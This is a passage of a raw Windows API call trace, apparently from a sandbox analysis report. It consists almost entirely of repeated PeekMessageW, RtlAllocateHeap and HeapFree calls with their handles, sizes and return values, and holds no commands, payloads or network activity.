hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.308] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff460 [0121.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0121.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0121.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.308] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0121.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0121.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0121.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0121.308] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.308] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.308] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0121.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0121.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.309] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.309] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.309] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.309] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.311] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.311] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.311] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.311] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.311] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.311] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.311] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.311] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.311] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.312] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.312] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.312] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0121.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a78 | out: hHeap=0x12c0000) returned 1 [0121.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.312] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.312] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.313] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.315] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0121.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0121.315] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0121.315] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.316] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.316] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.316] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.316] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.317] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.317] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0121.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0121.317] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.317] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.318] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.318] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0121.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0121.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0121.318] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.318] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.319] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.319] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0121.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0121.319] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0121.320] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0121.320] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0121.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0121.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491b38 [0121.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be0d8 [0121.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0121.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0121.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd610 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fefb0 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0121.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xca) returned 0x133c8a0 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3e8 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd4c0 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd670 [0121.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c8a0 | out: hHeap=0x12c0000) returned 1 [0121.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0121.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0121.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3e8 | out: hHeap=0x12c0000) returned 1 [0121.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0121.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fefb0 | out: hHeap=0x12c0000) returned 1 [0121.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0121.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0121.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c210) returned 0x1530b90 [0121.330] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.330] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0121.330] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.330] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c210) returned 0x154cda8 [0121.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be0d8 | out: hHeap=0x12c0000) returned 1 [0121.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0121.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0121.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1530b90 | out: hHeap=0x12c0000) returned 1 [0121.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0121.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 